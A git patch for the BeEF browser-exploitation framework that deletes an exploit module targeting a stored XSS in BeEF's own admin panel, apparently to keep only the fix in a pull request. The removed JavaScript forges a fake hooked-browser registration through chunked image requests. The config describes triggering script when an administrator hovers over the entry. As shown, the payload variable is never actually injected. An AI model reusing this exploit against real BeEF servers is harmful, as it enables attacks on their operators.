From e3a668e2586c9861f1995d4bf19b4ff1821fe409 Mon Sep 17 00:00:00 2001
From: zinduolis
Date: Wed, 25 Feb 2026 15:19:47 +1000
Subject: [PATCH] sanitise PR to have just the fix
---
.../exploits/beef_admin_panel_xss/command.js | 168 ------------------
.../exploits/beef_admin_panel_xss/config.yaml | 15 --
.../exploits/beef_admin_panel_xss/module.rb | 17 --
3 files changed, 200 deletions(-)
delete mode 100644 modules/exploits/beef_admin_panel_xss/command.js
delete mode 100644 modules/exploits/beef_admin_panel_xss/config.yaml
delete mode 100644 modules/exploits/beef_admin_panel_xss/module.rb
diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js
deleted file mode 100644
index 57bb478cd..000000000
--- a/modules/exploits/beef_admin_panel_xss/command.js
+++ /dev/null
@@ -1,168 +0,0 @@
-//
-// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - https://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-
- var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>";
- var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>";
-
- // Generate a random session ID (80 characters, uppercase + digits)
- function generateHookId() {
- var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
- var result = '';
- for (var i = 0; i < 80; i++) {
- result += chars.charAt(Math.floor(Math.random() * chars.length));
- }
- return result;
- }
-
- // Get current timestamp in milliseconds
- function ts() {
- return Date.now();
- }
-
- // Split string into chunks
- function chunkString(str, length) {
- var chunks = [];
- for (var i = 0; i < str.length; i += length) {
- chunks.push(str.substring(i, i + length));
- }
- return chunks;
- }
-
- // Base64 encode (using browser's btoa)
- function b64encode(str) {
- return btoa(str);
- }
-
- var HOOK = generateHookId();
-
- // Build the malicious payload - XSS is injected into host.os.name
- // Note: the payload is wrapped in the img onerror handler
- var malicious_os_name = "Linux";
-
- var browser_data = [{
- "cid": 0,
- "results": {
- "browser.window.cookies": "BEEFHOOK=" + HOOK,
- "browser.name": "FFAA",
- "browser.version": "146.0",
- "browser.engine": "Gecko",
- "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
- "browser.platform": "Linux x86_64",
- "browser.language": "en-US",
- "browser.plugins": "PDF Viewer-v.undefined",
- "browser.window.title": "Unknown",
- "browser.window.origin": "http://exploited-host:8000",
- "browser.window.hostname": "exploited-host",
- "browser.window.hostport": "8000",
- "browser.window.uri": "http://exploited-host:8000/victim.html",
- "browser.window.referrer": "http://exploited-host:8000/victim.html",
- "browser.window.size.width": 1678,
- "browser.window.size.height": 168,
- "browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)",
- "host.os.name": malicious_os_name,
- "host.os.family": "Linux",
- "host.os.arch": 64,
- "host.software.defaultbrowser": "Unknown",
- "hardware.type": "Unknown",
- "hardware.memory": "unknown",
- "hardware.gpu": "unknown",
- "hardware.gpu.vendor": "unknown",
- "hardware.cpu.arch": "x86_64",
- "hardware.cpu.cores": 32,
- "hardware.battery.chargingstatus": "unknown",
- "hardware.battery.level": "unknown",
- "hardware.battery.chargingtime": "unknown",
- "hardware.battery.dischargingtime": "unknown",
- "hardware.screen.size.width": 5120,
- "hardware.screen.size.height": 2160,
- "hardware.screen.colordepth": 24,
- "hardware.screen.touchenabled": "No",
- "browser.capabilities.vbscript": "No",
- "browser.capabilities.flash": "No",
- "browser.capabilities.silverlight": "No",
- "browser.capabilities.phonegap": "No",
- "browser.capabilities.websocket": "Yes",
- "browser.capabilities.webrtc": "No",
- "browser.capabilities.webworker": "Yes",
- "browser.capabilities.webgl": "No",
- "browser.capabilities.googlegears": "No",
- "browser.capabilities.activex": "No",
- "browser.capabilities.quicktime": "No",
- "browser.capabilities.realplayer": "No",
- "browser.capabilities.wmp": "No",
- "browser.capabilities.vlc": "No",
- "HookSessionID": HOOK
- },
- "status": 0,
- "handler": "/init"
- }];
-
- var encoded_data = b64encode(JSON.stringify(browser_data));
- var chunks = chunkString(encoded_data, 383);
-
- beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
- beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
- beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
-
- var requests_sent = 0;
- var requests_completed = 0;
- var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
-
- function checkComplete() {
- if (requests_completed >= total_requests) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>,
- "result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK +
- ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
- beef.are.status_success());
- }
- }
-
- // Send chunks for session IDs 1 and 2
- for (var sid = 1; sid <= 2; sid++) {
- for (var idx = 0; idx < chunks.length; idx++) {
- (function(s, i, chunk) {
- var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
- var img = new Image();
- img.onload = img.onerror = function() {
- requests_completed++;
- checkComplete();
- };
- img.src = url;
- requests_sent++;
- })(sid, idx, chunks[idx]);
- }
- }
-
- // Send hook.js request after a short delay
- setTimeout(function() {
- var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
- var img2 = new Image();
- img2.onload = img2.onerror = function() {
- requests_completed++;
- checkComplete();
- };
- img2.src = hookUrl;
- requests_sent++;
-
- // Send final dh request
- setTimeout(function() {
- var finalChunk = chunks[chunks.length - 1] || "";
- var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
- var img3 = new Image();
- img3.onload = img3.onerror = function() {
- requests_completed++;
- checkComplete();
- };
- img3.src = finalUrl;
- requests_sent++;
- }, 100);
- }, 500);
-
- beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
-
-});
diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml
deleted file mode 100644
index 2b2baaad5..000000000
--- a/modules/exploits/beef_admin_panel_xss/config.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - https://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
- module:
- beef_admin_panel_xss:
- enable: true
- category: "Exploits"
- name: "BeEF Admin Panel XSS"
- description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.

This can be used to test if a target BeEF instance is running a vulnerable version."
- authors: ["author"]
- target:
- working: ["ALL"]
diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb
deleted file mode 100644
index f44675c17..000000000
--- a/modules/exploits/beef_admin_panel_xss/module.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#
-# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - https://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Beef_admin_panel_xss < BeEF::Core::Command
- def self.options
- [
- { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
- { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert(String.fromCharCode(88,83,83))", 'width' => '400px' }
- ]
- end
-
- def post_execute
- save({ 'result' => @datastore['result'] })
- end
-end